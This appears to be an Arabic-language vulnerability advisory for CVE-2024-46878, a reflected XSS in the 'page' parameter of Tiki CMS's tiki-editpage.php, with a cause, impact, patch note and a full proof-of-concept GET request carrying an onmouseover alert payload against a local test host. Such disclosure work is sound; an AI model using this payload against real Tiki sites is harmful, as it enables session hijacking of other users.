
CVE-2024-46878 - ثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة في Tiki CMS
Tiki CMS - ثغرة البرمجة النصية عبر المواقع المنعكسة (XSS) في معامل 'page'
مخصصة فقط للأغراض التعليمية والبحثية والدفاعية. الاستخدام غير المصرح به ضد الأنظمة دون إذن غير قانوني.
توجد ثغرة برمجة نصية عبر المواقع المنعكسة (XSS) في معامل page في ملف tiki-editpage.php في Tiki الإصدار 26.3 وما قبله. تسمح هذه الثغرة للمهاجمين بتنفيذ كود JavaScript تعسفي عبر حمولة مصممة بعناية، مما يؤدي إلى احتمال الوصول إلى معلومات حساسة أو إجراءات غير مصرح بها.
تنجم الثغرة عن عدم كفاية تعقيم المدخلات لمعامل page في tiki-editpage.php. ينعكس الإدخال المقدم من المستخدم في استجابة HTTP دون ترميز كافٍ، مما يسمح بتنفيذ JavaScript محقون.
تسمح لمهاجم مصادق بتنفيذ JavaScript تعسفي في متصفح مستخدم آخر عبر طلب مصمم بعناية، مما قد يؤدي إلى اختطاف الجلسة أو إجراءات غير مصرح بها.
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

تمت معالجة المشكلة في Tiki CMS Groupware الإصدار 27.1. يُنصح المستخدمون بالترقية إلى هذا الإصدار أو أي إصدار مصحح لاحق.